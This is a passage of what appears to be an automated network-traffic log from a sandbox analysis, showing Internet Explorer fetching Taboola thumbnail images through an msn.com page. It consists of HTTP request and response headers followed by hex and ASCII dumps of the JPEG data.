54 77 f2 96 a9 ff 00 11 f5 c9 2f b4 25 15 0c 1d 16 f9
                                                              Data Ascii: g!qGg[UGveN59Gv$|7xJ!VU'JGb1>{rE*e=Fl4$$i;7bkY+v`Qtm+o%$;Gatu}P%6("/mwyX%F_z70E8Tw/%
                                                              2021-10-20 13:08:56 UTC59INData Raw: 05 d6 e5 ad d5 54 e0 44 ae f3 91 6c e7 c4 9c d3 5d 3a 1c 3a 5c ac 13 f4 d1 22 f2 3e 84 7b ff 00 f7 7e d2 89 1d 7c 51 14 bf e6 06 07 ec a5 88 a9 17 cc 1e 58 0c ae 4b 1d 24 3b d9 3d 4d d0 19 b9 d3 67 ee fa 3f ee 67 fe 8f a5 d6 7f c9 33 6c f4 f7 fc 16 3e 78 aa 00 e4 31 15 01 db 55 d9 18 cb 67 9f 31 8e a2 59 ca 95 08 43 28 4f 82 40 4e 36 c0 2b 03 cc 11 ee b7 82 29 78 87 ff 00 8a 42 af f4 65 a7 0f 21 44 8a 87 7e 5a bb 6b e8 b8 55 63 8c e9 4a 1b 93 b0 19 b9 55 fc be 8f 38 67 fe 8f a5 d6 7f fa 3e 8f 5e f7 a9 eb 87 b0 53 f0 fe d9 ff 00 b6 05 5b e5 85 23 27 51 62 2b 61 be 6d 22 ea 7f 53 9f 1a a1 0b e9 77 ee da 1a 89 07 94 48 03 67 0b 3c 5a c4 a3 5b ba b0 7b e6 d4 c0 1c e1 78 39 6d 3b f0 17 67 f8 b4 d7 7c b0 1f 16 13 a1 23 fc 47 fe 3e 8f ff 00 7f e3 13 7d 2f f3 1f
                                                              Data Ascii: TDl]::\">{~|QXK$;=Mg?g3l>x1Ug1YC(O@N6+)xBe!D~ZkUcJU8g>^S[#'Qb+am"SwHg<Z[{x9m;g|#G>}/
                                                              2021-10-20 13:08:56 UTC60INData Raw: 17 33 93 d7 bc f7 80 54 72 d0 2d 7c e4 63 58 6c 5d 03 e7 d3 2b ff 00 4c d7 ce f6 62 2c 65 d2 93 cf cb 37 0b ce f1 83 28 01 7c 2c 6c 37 f2 02 f1 99 46 9d 44 9b a4 19 73 c3 ec f9 e1 8b d2 50 1f 39 46 33 98 cd d9 82 8c 05 d1 0d 20 1b a5 1e ed ff 00 17 3c b6 56 5d 47 ce bd c0 2f 66 f1 82 7a 17 1b 1c d4 ac 45 d1 af 43 8f 24 68 6c a0 62 01 f2 f3 c5 8e 25 5a 55 1b 05 03 2c f5 73 f0 a8 f1 38 0a aa 16 9a 47 fb 58 b1 a6 b7 91 17 a0 2e d4 9f 22 73 ba 8a 11 77 da 80 af 76 fe 99 b2 db 1f bb 3e 37 d5 e1 f1 1c d2 3f 44 83 6b 04 8b 5d 59 b0 b6 06 bc 0e 00 7b 19 81 5b 1b f7 df 28 95 3b 7a e0 d6 c3 08 66 00 02 0d ee db 7e 41 b3 f5 f2 ad b8 ea a3 09 d7 0a 30 50 68 ea 57 d2 47 c9 b0 a8 8b 8a 90 2a fe e9 36 be ea 8a 17 ec 20 1f b7 29 1b b7 a2 e4 a5 22 60 24 ed 40 37 29 f4 e6
                                                              Data Ascii: 3Tr-|cXl]+Lb,e7(|,l7FDsP9F3 <V]G/fzEC$hlb%ZU,s8GX."swv>7?Dk]Y{[(;zf~A0PhWG*6 )"`$@7)


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              6 | 192.168.2.5 | 49836 | 151.101.1.44 | 443 |
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              2021-10-20 13:08:55 UTC | 16 | OUT | GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpg HTTP/1.1
                                                              Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                              Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                              Accept-Language: en-US
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Accept-Encoding: gzip, deflate
                                                              Host: img.img-taboola.com
                                                              Connection: Keep-Alive
                                                              2021-10-20 13:08:56 UTC | 32 | IN | HTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 10756
                                                              Server: nginx
                                                              Content-Type: image/jpeg
                                                              access-control-allow-headers: X-Requested-With
                                                              access-control-allow-origin: *
                                                              edge-cache-tag: 623105471311786779303628346285156873834,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                              etag: "530961f46738bb75e8a8c20ef3ac7b8b"
                                                              expiration: expiry-date="Sat, 02 Oct 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days"
                                                              last-modified: Wed, 01 Sep 2021 04:44:02 GMT
                                                              timing-allow-origin: *
                                                              x-ratelimit-limit: 101
                                                              x-ratelimit-remaining: 100
                                                              x-ratelimit-reset: 1
                                                              x-envoy-upstream-service-time: 21
                                                              X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb804
                                                              Via: 1.1 varnish, 1.1 varnish
                                                              Cache-Control: public, max-age=31536000
                                                              Accept-Ranges: bytes
                                                              Date: Wed, 20 Oct 2021 13:08:55 GMT
                                                              Age: 2502654
                                                              X-Served-By: cache-wdc5571-WDC, cache-dca17782-DCA, cache-mxp6972-MXP
                                                              X-Cache: HIT, HIT, HIT
                                                              X-Cache-Hits: 1, 1, 1
                                                              X-Timer: S1634735336.999038,VS0,VE1
                                                              Vary: ImageFormat
                                                              X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpg
                                                              X-vcl-time-ms: 1
                                                              2021-10-20 13:08:56 UTC33INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e2 02 40 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 02 30 41 44 42 45 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 cf 00 06 00 03 00 00 00 00 00 00 61 63 73 70 41 50 50 4c 00 00 00 00 6e 6f 6e 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 41 44 42 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 63 70 72 74 00 00 00 fc 00 00 00 32 64 65 73 63 00 00 01 30 00 00 00 6b 77 74 70 74 00 00 01 9c 00 00 00 14 62 6b 70 74 00 00 01 b0 00 00 00 14 72 54 52 43 00 00 01 c4 00 00 00 0e 67 54 52 43 00 00 01 d4 00 00 00 0e 62 54 52 43 00 00 01 e4 00 00 00 0e 72
                                                              Data Ascii: JFIF@ICC_PROFILE0ADBEmntrRGB XYZ acspAPPLnone-ADBEcprt2desc0kwtptbkptrTRCgTRCbTRCr
                                                              2021-10-20 13:08:56 UTC35INData Raw: 63 85 3a b6 30 b5 9d 0f 38 d2 7b 38 c3 84 66 5d e9 e5 1c e2 8a c2 2a 46 57 4d 8a f8 eb 5e 54 a2 67 8b 3a 65 6f be 6c 49 67 b8 ad 4d 52 00 76 8d 00 54 b5 2a 2c c8 47 f1 b9 17 8e b2 69 f7 fc ef 41 74 c0 c2 bc 7d 39 96 bb 9c b7 fb 1e 4d d1 a6 40 bc d7 65 f4 97 2b 2e cb 37 da 2e 62 95 cc da b9 79 81 f5 6a 60 a0 bb 59 e3 25 8a 94 e0 20 38 41 e6 55 24 98 ca 19 96 80 3c 93 6e b2 0b 60 e6 db aa 93 4f 35 97 b3 83 13 be 35 42 6b 79 15 a7 fa 0d 4b 93 23 b9 a0 3a c6 c2 54 eb 48 66 a4 32 6d af bb e5 7a 30 67 12 9d 9d bb d1 b4 54 83 62 10 ca 9a ce 86 a4 e7 20 10 d9 1a 13 4f 67 64 94 5a d1 25 b8 65 fa 3a ae b0 67 3f 60 20 d1 45 96 a5 44 26 68 d9 71 9b 47 fe 03 b2 3a d7 c5 1c 9a a2 74 7d 6e 1e 88 f0 cd 87 27 5a 68 c4 d6 aa fa de 79 4d 17 32 da a0 88 3f 8c e6 e6 80 79 34
                                                              Data Ascii: c:08{8f]*FWM^Tg:eolIgMRvT*,GiAt}9M@e+.7.byj`Y% 8AU$<n`O55BkyK#:THf2mz0gTb OgdZ%e:g?` ED&hqG:t}n'ZhyM2?y4
                                                              2021-10-20 13:08:56 UTC36INData Raw: 33 77 a3 fc 34 84 a9 19 aa 91 b8 9a 33 95 24 1e d7 fa 9c 94 7d b9 74 7d c7 26 19 70 7c e4 e3 ee 38 e3 2d 2e 15 f7 80 60 19 c6 01 c9 cd ec 82 49 b8 ed ea 18 bb 2e 45 2a 9d 4b a4 a8 63 e6 2b b1 c3 1b f7 b2 ac d3 a8 48 55 bc f2 56 a8 e8 cd 4a c4 8e ca b2 08 27 1f bb 18 af 68 0c 35 8d db 60 8c 8f b8 4a 30 7c 7f 43 8e 3d 1c bc 3d e4 c3 2e 0f 9c 9c 7d c7 1c 65 91 f3 8c 3d e0 c1 9c e7 39 bb 3d 9b 17 8c 1d f0 56 85 06 50 b0 50 a8 ca d7 f5 35 e1 91 ed 59 d2 f5 34 16 15 7c 51 cc 14 d1 05 56 eb 9e c0 50 c9 53 a9 64 98 fd 3d bf 1e de 8a a1 b5 95 1c 2d 94 3d b0 77 9b 08 ac bf d0 e3 0f 59 7d 72 61 97 47 ce 58 fd d8 e3 2c 0f 59 27 a3 9c e7 76 77 61 7c ea 37 8e 1d b5 72 e3 78 d1 49 49 64 47 af cf 9b 9e 20 4e 96 d5 d7 8e 6d 81 88 56 b8 51 a0 ad d3 fb 6b b5 b7 f7 f5 57 25
                                                              Data Ascii: 3w43$}t}&p|8-.`I.E*Kc+HUVJ'h5`J0|C==.}e=9=VPP5Y4|QVPSd=-=wY}raGX,Y'vwa|7rxIIdG NmVQkW%
                                                              2021-10-20 13:08:56 UTC37INData Raw: 1f 6a 99 1f 38 0c 78 39 54 92 f7 3b b3 68 ef 5b 5e 5e 21 aa a3 1e ba 95 7a aa 7a 9b 50 9b 8a b0 41 d8 db 03 af eb 7a 7b c7 8e 95 5a 96 ac 3b a8 93 53 1a 5b 91 dc 45 59 d1 0a 65 dd 4d 81 3b 78 6b 49 ad d9 5c 88 c5 18 e9 ba 17 f4 35 f6 37 f5 15 f5 9b fd 4e dd bc 30 4d 3c 12 af 1d d1 75 25 0b 97 fa 63 71 56 b2 de b1 1e a3 a5 20 ab 50 6e ea ae 83 a2 d3 5e 99 2d 51 3e fb a2 a9 15 d9 dd 45 da 35 c9 53 57 59 f5 3a d5 16 4a 3b ca 4b 73 b1 b0 7a 79 12 c0 4e da 96 22 49 10 08 51 40 ec 11 10 d1 a9 e6 36 fb 01 39 0c a2 51 91 32 a9 93 85 54 37 36 2d 3c 8b 1d c2 9b d9 2b e5 e2 3e af 54 83 25 d6 c1 6f ab f4 74 a4 4e 9a e6 7d 15 19 4e 54 ed d8 53 11 ca 2b c8 a2 46 86 5c 29 fc 65 b3 32 d7 99 63 cf f8 fe f4 56 f4 d3 6a 9b 37 94 75 db 4d 55 9a fb 1a bd 2f d2 ee 95 e6 9a 5d
                                                              Data Ascii: j8x9T;h[^^!zzPAz{Z;S[EYeM;xkI\57N0M<u%cqV Pn^-Q>E5SWY:J;KszyN"IQ@69Q2T76-<+>T%otN}NTS+F\)e2cVj7uMU/]
                                                              2021-10-20 13:08:56 UTC39INData Raw: 04 cf 0a ea 65 b2 9c fb 31 4f 13 10 39 86 08 e4 03 d4 75 82 7c 08 d3 93 c7 1b ae 92 ad bd b1 5e 69 55 ff 00 e3 9d 7a 2f da 25 e8 75 0e 0a 91 d0 ed df c9 7d 0e b6 5d 6c 12 d7 7c dd eb 0e c6 99 ac c9 a1 d7 da d0 d7 82 a9 82 57 00 72 a3 cc 63 ea 9d 6c dc db 7f 25 49 83 2d 34 58 c8 07 35 37 e3 a8 92 c2 d8 d1 c5 3c be c6 a6 b4 63 8c 9e 01 e3 f4 3c 6b f9 c9 97 c6 a4 82 9e 2b 70 3c 33 a6 df a5 df 4d 34 af 41 2a d0 8a f5 62 b5 ae c7 a4 b9 f5 9d b2 c7 b9 86 ce bb 6d b1 a1 23 69 d2 49 a7 1d c6 85 74 58 c7 af 1a 7f 0b 1a 83 f1 19 e3 f0 cc 48 f8 11 f7 9f 84 ac bf c3 57 4e 3e 0c 09 86 04 23 8e 36 4f f4 80 b7 17 6c 83 3e aa 74 8a 7b 1e a4 45 65 af e5 98 7a 4a c8 f1 a9 c8 a2 ed 90 9c d6 48 e9 28 c7 98 18 f2 47 1c e5 d9 78 4e 03 52 90 01 ef 2e b2 4c bc 1c 4a eb 1c 91 cf
                                                              Data Ascii: e1O9u|^iUz/%u}]l|Wrcl%I-4X57<c<k+p<3M4A*bm#iItXHWN>#6Ol>t{EezJH(GxNR.LJ
                                                              2021-10-20 13:08:56 UTC40INData Raw: 43 5c 8a 9a cd a5 b1 49 77 4c 4d d8 92 30 22 ed 1b 0a ab 44 a6 a4 42 56 3d 48 2d d8 9c 64 cf 82 8e c8 dc c5 98 8a 3a 12 6b d9 d3 d3 bc 95 d0 ba 7a 6d 6c 8a bd 1c 5f 02 e8 ed c1 52 8c 60 27 14 29 c4 ce 26 68 71 4f 9e e8 84 9a 23 56 7e 4f 52 7e 4f 52 7e 4a b3 93 7a b1 b6 5d 97 7e 4b 99 3f 27 ff c4 00 2b 11 00 02 02 01 03 03 03 04 02 03 01 00 00 00 00 00 01 02 00 11 03 12 21 31 10 41 51 04 20 71 22 32 61 81 13 14 05 23 72 91 ff da 00 08 01 02 01 01 3f 00 97 d2 e5 cb e9 46 54 da 31 80 c1 2e 5c b9 72 fa 17 d3 35 cd 46 59 8c 77 82 2f 4b f6 b7 31 2b bc ff 00 5f e6 31 4e d7 0e e6 08 be dd 26 ae 3e 45 58 d9 e6 3c 8a df 3e d5 97 d4 6e 63 9d a3 ee 66 91 38 31 0d 80 7d 8b ec 5e 63 0b 58 d8 d8 6e 14 d7 9e 85 07 21 81 98 be d0 3f 3e c5 f6 2f 31 8e 95 b9 90 ae f6 cc 5b
                                                              Data Ascii: C\IwLM0"DBV=H-d:kzml_R`')&hqO#V~OR~OR~Jz]~K?'+!1AQ q"2a#r?FT1.\r5FYw/K1+_1N&>EX<>ncf81}^cXn!?>/1[
                                                              2021-10-20 13:08:56 UTC42INData Raw: 57 7e 1d 8c 2b 51 6c a3 11 43 ec ea 1b 6d 7d c5 e5 7a 8f 65 28 ee dc 44 73 da d0 9a 35 16 cd 6d 2d d1 87 88 32 f5 f0 dc 2c df ee 21 f8 5c 79 cd 02 88 b4 a9 39 ff 00 4d 51 86 95 17 ce 14 7b 5c 74 33 51 1b d0 99 50 eb cc 9f 74 c3 ee a7 7a 37 45 d4 89 52 df 90 c7 34 c9 2b 4a e2 d6 59 c5 4d 85 e6 ae 96 36 84 a2 30 a4 be 0b 48 58 fe 8d 29 02 1b 45 de fe 32 bb d5 1a 15 f8 88 f2 09 2b 5d 86 a2 db 79 de 14 65 53 4d fc be 21 00 17 50 49 ea c4 01 2e 87 e0 71 a3 53 6e 4c b3 3d 6c 23 05 5a 9b 67 43 aa b8 81 29 1d 95 12 ef 2b 56 21 7e 27 aa 47 f8 ca 88 1b 5b 67 26 2b d8 68 0c ee ea b8 25 4a b5 c6 91 2a d0 61 f1 27 2f 31 ee 80 06 e4 9b 01 33 7e 5d 61 a6 cc a4 07 3a 91 7e 60 4a b5 2b 77 a0 d4 cf f5 8e 62 2e 60 db 81 b8 83 32 90 c3 c4 4e 56 61 d4 4c eb 45 c3 15 e7 61 bc
                                                              Data Ascii: W~+QlCm}ze(Ds5m-2,!\y9MQ{\t3QPtz7ER4+JYM60HX)E2+]yeSM!PI.qSnL=l#ZgC)+V!~'G[g&+h%J*a'/13~]a:~`J+wb.`2NVaLEa
                                                              2021-10-20 13:08:56 UTC43INData Raw: 72 80 f6 a2 53 64 a5 5e 81 bd 1c 50 4d ed d1 a5 ac 2f 68 4a 61 e9 31 83 e1 1a fa 4d d8 43 99 69 1a 4b fd 64 38 3f aa 46 a5 86 76 35 2a b2 e8 d5 19 cd f4 e8 22 25 30 2c 05 b4 12 93 73 2a 5a cc 39 5f 4f d0 c2 4d 82 df 9d b7 9a 04 d2 1b 02 6c 26 e4 cb e8 04 fb 4b 15 a4 b7 d5 9c cb ae 19 0d 3a 5e 2e fa bb 41 c2 99 81 9f 10 13 6c 0d 7f d1 98 4b a9 42 7d 08 8c f8 67 56 ce 1b 53 4c 87 20 b2 f8 45 5c e7 33 15 00 66 27 9e 9d 96 71 08 a5 84 a6 2a 55 e8 d5 39 03 e0 20 29 7c b9 6e 38 bc 23 51 a4 ea d8 f0 85 b4 a6 f4 aa 05 74 5f 02 1e 68 03 19 a3 d4 28 a7 ca 6e 65 f8 c4 d7 19 89 42 d6 fc 09 a9 68 a9 49 05 91 2d 2c 42 66 51 79 6a 95 08 2e 5b 42 41 d8 79 08 05 47 5b 2b 1e 40 1b 69 06 6c 84 7a dc ce 2b 4a 94 8d 17 0f 9e 9d 8e a4 11 66 ea 25 0a d8 7a 42 e5 e9 1b 3d bc a1
                                                              Data Ascii: rSd^PM/hJa1MCiKd8?Fv5*"%0,s*Z9_OMl&K:^.AlKB}gVSL E\3f'q*U9 )|n8#Qt_h(neBhI-,BfQyj.[BAyG[+@ilz+Jf%zB=


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                              7           192.168.2.5  49837        151.101.1.44    443
                                                              Timestamp                kBytes transferred  Direction  Data
                                                              2021-10-20 13:08:56 UTC  60                  OUT        GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F0d7ca0c89d5d09bf1d71170b01c3a769.jpg HTTP/1.1
                                                              Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                              Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                              Accept-Language: en-US
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Accept-Encoding: gzip, deflate
                                                              Host: img.img-taboola.com
                                                              Connection: Keep-Alive
                                                              2021-10-20 13:08:56 UTC  61                  IN         HTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 20936
                                                              Server: nginx
                                                              Content-Type: image/jpeg
                                                              access-control-allow-headers: X-Requested-With
                                                              access-control-allow-origin: *
                                                              edge-cache-tag: 473400065816504481344293484750649737046,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                              etag: "5df328bbe8286a6a8e4b090ca69cf91a"
                                                              last-modified: Fri, 24 Sep 2021 14:34:42 GMT
                                                              status: 200 OK
                                                              timing-allow-origin: *
                                                              x-ratelimit-limit: 101
                                                              x-ratelimit-remaining: 99
                                                              x-ratelimit-reset: 1
                                                              x-request-id: 0d7fca08a2fdbad28b0e23d7330c8e5c
                                                              x-envoy-upstream-service-time: 23
                                                              X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb803
                                                              Via: 1.1 varnish, 1.1 varnish
                                                              Cache-Control: public, max-age=31536000
                                                              Accept-Ranges: bytes
                                                              Date: Wed, 20 Oct 2021 13:08:56 GMT
                                                              Age: 2022866
                                                              X-Served-By: cache-wdc5548-WDC, cache-dca17760-DCA, cache-mxp6942-MXP
                                                              X-Cache: HIT, HIT, HIT
                                                              X-Cache-Hits: 1, 1, 2
                                                              X-Timer: S1634735336.052823,VS0,VE0
                                                              Vary: ImageFormat
                                                              X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F0d7ca0c89d5d09bf1d71170b01c3a769.jpg
                                                              X-vcl-time-ms: 0
                                                              2021-10-20 13:08:56 UTC62INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 03 03 03 04 04 04 04 05 05 05 05 05 07 07 06 06 07 07 0b 08 09 08 09 08 0b 11 0b 0c 0b 0b 0c 0b 11 0f 12 0f 0e 0f 12 0f 1b 15 13 13 15 1b 1f 1a 19 1a 1f 26 22 22 26 30 2d 30 3e 3e 54 01 03 03 03 03 03 03 04 04 04 04 05 05 05 05 05 07 07 06 06 07 07 0b 08 09 08 09 08 0b 11 0b 0c 0b 0b 0c 0b 11 0f 12 0f 0e 0f 12 0f 1b 15 13 13 15 1b 1f 1a 19 1a 1f 26 22 22 26 30 2d 30 3e 3e 54 ff c2 00 11 08 01 37 00 cf 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 00 06 03 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 00 01 08 09 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ed 65 29 45 db 83 a0 11 a9 cb 51 94 60
                                                              Data Ascii: JFIF&""&0-0>>T&""&0-0>>T7"5e)EQ`
                                                              2021-10-20 13:08:56 UTC63INData Raw: 56 d0 dc 0f 89 19 82 c7 74 8e 0f 69 35 6b 45 86 8f 38 c0 29 7c 5c e6 2f 8b bb 12 c8 73 f3 80 98 c6 dd 27 48 d4 51 1d 80 b9 a9 b6 66 63 5a 27 30 09 37 32 a4 03 cc a9 d9 79 92 da 9d b3 0b 29 2e 64 8b 03 99 50 e3 1c cc 6c 83 b3 06 28 de 60 d3 a5 cc a9 91 24 cc 0f ff c4 00 31 10 00 01 04 02 02 02 02 01 02 06 02 01 05 00 00 00 03 01 02 04 05 00 06 07 11 12 13 08 21 14 15 31 10 22 23 32 41 51 16 20 17 18 24 33 35 61 ff da 00 08 01 01 00 01 09 00 6f 49 8d 63 53 ed 15 bd ab 7e d5 18 e4 55 45 45 44 c7 01 ae ed 7b 51 74 9d e7 8a 62 b1 33 c5 31 13 13 eb 11 51 53 3c 71 8c 55 5c f5 f4 a9 da 3d bd 3b 11 11 73 ac 4c f1 c5 fa c4 5e ff 00 82 e2 a6 35 7a 4c f3 fa c6 9d 7a e9 55 92 13 a5 f2 c4 73 5d 8e eb fc 2b 7a 5c 7b 13 ef ac 46 39 57 ae 9e 27 b5 3b e9 31 b8 88 98 d6 aa
                                                              Data Ascii: Vti5kE8)|\/s'HQfcZ'072y).dPl(`$1!1"#2AQ $35aoIcS~UEED{Qtb31QS<qU\=;sL^5zLzUs]+z\{F9W';1
                                                              2021-10-20 13:08:56 UTC65INData Raw: 2a 2e 95 43 e1 9e bc f0 ce b3 c3 bc 56 75 9e 38 a9 8a dc fb 4c 45 c7 3b a5 6a 74 c5 42 2a b7 10 86 ec cc 57 6e 6c 97 3b 67 e3 ba e3 8b 90 e7 d4 eb 97 3b d4 ba e4 d6 f8 86 d9 8e d4 ef ed e5 ed bb a4 aa f9 f7 e2 2d 07 1d dc 71 76 95 3c b4 34 82 b7 e4 0d 47 57 b4 fd 36 74 fd df 77 d6 0d ac ca a4 a6 5d 9b 6a b0 67 1c ea d0 75 8d c6 ca ec 97 7b 24 5b 6b 65 96 e1 a4 96 b8 41 b7 92 f9 0a 35 71 e0 d9 dd 00 4f 20 ac d1 f9 df 79 f5 82 09 0e f4 63 1b b0 72 de 81 ae 90 80 7c ab ff 00 95 3a 65 19 bc 48 19 9f 32 68 d0 aa c8 b7 fa 5f 37 ec 9b 78 88 48 15 d0 37 4d 7a d0 01 2c 73 97 64 a9 12 f4 f9 4d da 69 d5 7a 6c bb 82 d3 5f b4 5d 5a c7 b0 aa 1b 23 b1 24 df 58 6e 32 21 c8 6e bd 79 b7 d4 f3 ed fa 53 c8 b1 75 bd 85 98 2b df 45 79 47 43 c9 9b 3e ad b4 92 c7 67 a5 de 79 16
                                                              Data Ascii: *.CVu8LE;jtB*Wnl;g;-qv<4GW6tw]jgu{$[keA5qO ycr|:eH2h_7xH7Mz,sdMizl_]Z#$Xn2!nySu+EyGC>gy
                                                              2021-10-20 13:08:56 UTC66INData Raw: ce 29 d5 b5 f1 81 76 28 e1 e5 fe 71 66 b6 c3 53 eb 84 98 7b 89 44 99 30 93 d2 6d c8 13 cc 76 62 b9 b8 ac 98 f9 84 26 e1 be 6c db 94 99 a8 74 78 42 46 ab fd f1 46 90 dc 84 8e fe 23 df b6 2a 4a 9b fd 72 83 2d 36 8d ee d4 f2 a7 6c b2 f6 ed fa d6 46 99 c9 b2 a2 6c 1a 38 22 c0 8c 2b 53 55 f2 33 a2 5d 6a f0 2f 9b 50 e5 70 de e6 3b 11 3b 5c 78 0a 8a aa 88 8f 54 fd f1 a6 cb 79 3d 56 1c 68 ba e5 23 f6 3b 25 8e e9 3a ac ee 07 1c b0 52 ae b1 bc 6a 90 35 5d ba 0f e9 d1 e1 49 5f 78 9f 97 b2 6c ca e2 b6 bc 74 e2 65 85 64 49 5f 95 ab 6f f7 3a 79 c6 7a ea 0d 8b 9f f9 0e fa 82 d4 25 15 97 17 72 b5 be df 73 4d ae d0 af c6 bf 92 53 be 9b a0 0f e2 37 c9 d2 7f 55 34 61 7c 35 f9 18 ff 00 a2 eb ce f8 69 cc ec 0a 32 65 99 be 29 6f 41 2f b6 5f 28 2f c6 97 81 7c 25 73 66 c3 c7 d1
                                                              Data Ascii: )v(qfS{D0mvb&ltxBFF#*Jr-6lFl8"+SU3]j/Pp;;\xTy=Vh#;%:Rj5]I_xltedI_o:yz%rsMS7U4a|5i2e)oA/_(/|%sf
                                                              2021-10-20 13:08:56 UTC68INData Raw: bc 9f 3e 52 83 f4 e6 fc 54 df fb 54 7c c8 df 12 b6 27 89 4e 5b d7 fc 56 47 11 82 8b 68 cf 8a f2 58 2e cb 76 1f 8a 95 50 d8 f7 4b 9d 57 c1 5c 7b 5f 15 55 b1 6a 69 75 4a 19 8a e8 55 e2 19 be 9d ed 91 ad c5 8b ea 3c f3 1b b9 31 98 58 f2 2a e2 c5 90 37 fa e4 a0 86 c4 fc 57 05 91 5b 1d 23 38 66 71 02 c0 9c f0 cf 1a 33 85 2f fa f6 06 81 29 11 ee 09 dc 45 39 c4 82 2d 81 dc 03 0c ac 99 2e da 44 62 c7 72 e7 e5 fb a3 a4 80 a3 1f 62 88 02 3c 0c 82 91 7d ca 03 40 aa da 25 1d cf 87 64 da 0b 7a fb 20 7a ed 46 59 de f7 48 95 34 af 96 34 11 4d 2e 42 4a 96 c2 98 4c 35 64 eb 61 34 25 9a 68 d6 61 92 f7 38 a4 ad 8b 1e 2f 9c 97 ac 9a d9 d2 11 06 68 ba ec 78 71 9d eb b1 8f 00 10 cc 36 ba 73 21 31 ae 24 8a 5c 9f b9 92 94 ce 55 ad 4b 53 ce 41 92 b2 da ba 53 4c 65 fe b9 e5 c4 80
                                                              Data Ascii: >RTT|'N[VGhX.vPKW\{_UjiuJU<1X*7W[#8fq3/)E9-.Dbrb<}@%dz zFYH44M.BJL5da4%ha8/hxq6s!1$\UKSASLe
                                                              2021-10-20 13:08:56 UTC69INData Raw: 52 82 3b aa ec d5 ca e5 7c 6a 76 b4 e1 4f 54 ca e9 52 88 16 05 c2 d7 a2 81 10 43 84 4d 7d ec 12 85 c7 3c 15 4e a3 ce 54 a9 94 05 e9 01 2a a2 55 9c 46 81 e8 2d 78 02 39 91 4a 95 b1 40 47 b9 8f 14 b7 7e 1b 1c 8c 91 16 14 b2 9c f2 a5 06 2a 3d a8 02 b9 b2 21 9b cc ff 00 9f 3d 45 20 83 f5 24 44 23 ab 46 28 b1 8c 0b 11 39 02 65 0c 8b 18 be c6 b1 ac 3d 8f e2 3d f1 0e 78 f2 c4 e0 bc ea 47 16 27 f3 39 c4 b0 d5 40 d7 9d ef 24 2a 92 4b 69 62 da b6 8c c7 27 81 ae 00 eb 86 00 a4 38 9d 30 03 ff 00 e5 40 4d 8b 24 24 60 9a d6 21 5a df 3c 12 95 ff 00 4f 71 e2 38 c8 83 19 45 12 5c 5f 0f 5b 9b 4f 25 a1 41 14 a3 85 2c 51 80 26 c9 3f 80 95 1c e6 fe 32 99 8e 20 de f0 a8 0a a8 49 10 e2 23 62 bd 06 ee e4 85 e3 86 26 38 52 fc 9a f2 30 cc fa 64 35 92 4a c9 92 3d 33 a5 4e 3c ca c5
                                                              Data Ascii: R;|jvOTRCM}<NT*UF-x9J@G~*=!=E $D#F(9e==xG'9@$*Kib'80@M$$`!Z<Oq8E\_[O%A,Q&?2 I#b&8R0d5J=3N<
